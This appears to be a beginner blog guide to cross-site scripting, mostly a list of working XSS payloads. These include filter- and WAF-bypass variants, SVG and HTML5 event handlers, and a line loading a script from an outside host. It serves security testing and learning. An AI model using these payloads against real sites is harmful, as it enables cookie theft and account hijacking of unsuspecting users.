XSS Payloads Guide: Simple Overview & Examples

If you're getting into web security or bug bounty hunting, you’ll definitely run into something called XSS (Cross-Site Scripting). It’s one of the most common web vulnerabilities - and understanding how it works is a big step toward becoming a skilled tester 🔐
In this guide, you’ll get a clear, simple overview of XSS payloads, how they work, and where they’re used - without unnecessary complexity.

What Is XSS (Cross-Site Scripting)?​

XSS is a vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users.
💡 In simple terms:

• The attacker sends JavaScript code
• The website executes it inside the victim’s browser

🎯 This can lead to:

• Cookie/session theft
• Account hijacking
• Redirects to malicious sites

---

Basic XSS Payloads​

These are the simplest forms of XSS, often used to test if a website is vulnerable.

<script>alert('XSS')</script>

📌 If this runs, the site is vulnerable.

Variations to Bypass Filters​

Attackers often try to bypass filters using tricks like:

<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>

💡 These techniques help bypass weak security filters.

---

XSS Using Image Tags​

Sometimes <script> tags are blocked. That’s where image-based payloads come in.

<img src=x onerror=alert('XSS');>

📌 The onerror event triggers when the image fails to load.

Advanced Variants​

<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>

🚀 These are used to bypass filters or WAFs.

---

SVG-Based XSS Payloads​

SVG elements can also execute JavaScript:

<svg onload=alert(1)>

More Examples​

<svg/onload=alert('XSS')>
<svg id=alert(1) onload=eval(id)>

💡 SVG payloads are powerful because they often bypass traditional filters.

---

HTML5 XSS Payloads​

Modern HTML5 features introduce new attack surfaces:

<input autofocus onfocus=alert(1)>
<video src=_ onloadstart="alert(1)">
<details open ontoggle="alert(1)">

📌 These rely on user interaction or auto-triggered events.

Touch-Based Payloads (Mobile)​

<body ontouchstart=alert(1)>
<body ontouchend=alert(1)>

📱 Useful when testing mobile-based interactions.

---

External Script Injection​

Instead of injecting code directly, attackers can load external scripts:

<script src=14.rs></script>

💡 This allows loading custom payloads remotely.

---

XSS via META Tag​

META refresh can be abused to execute JavaScript:

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,...">

With Redirect Trick​

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

🚨 This technique can redirect users to malicious code.

---

XSS in Hidden Inputs​

Even hidden fields can be exploited:

<input type="hidden" accesskey="X" onclick="alert(1)">

📌 Trigger using keyboard shortcuts like: CTRL + SHIFT + X

---

DOM-Based XSS​

This type happens entirely on the client side:

#"><img src=/ onerror=alert(2)>

💡 It manipulates the DOM without server involvement.

---

XSS in JavaScript Context​

Sometimes you inject payloads inside JavaScript itself:

-(confirm)(document.domain)//
; alert(1);//

📌 Useful when quotes are filtered.

---

XSS via URL Injection​

XSS can also be triggered directly from the URL:

URL/<svg onload=alert(1)>
URL/<input autofocus onfocus=alert(1)>

🌐 This is often used in reflected XSS testing.

---

Important Notes for Ethical Hackers​

Before you start testing:

• ✅ Always test on authorized targets only
• ❌ Never exploit real users
• ⚖️ Follow bug bounty program rules

---

Final Thoughts​

Understanding XSS payloads is essential if you want to get into penetration testing or bug bounty hunting.
Start simple, then explore advanced techniques. Over time, you’ll learn how to:

• Detect vulnerabilities
• Bypass filters
• Secure web applications

🔐 The goal isn’t just exploitation - it’s understanding and prevention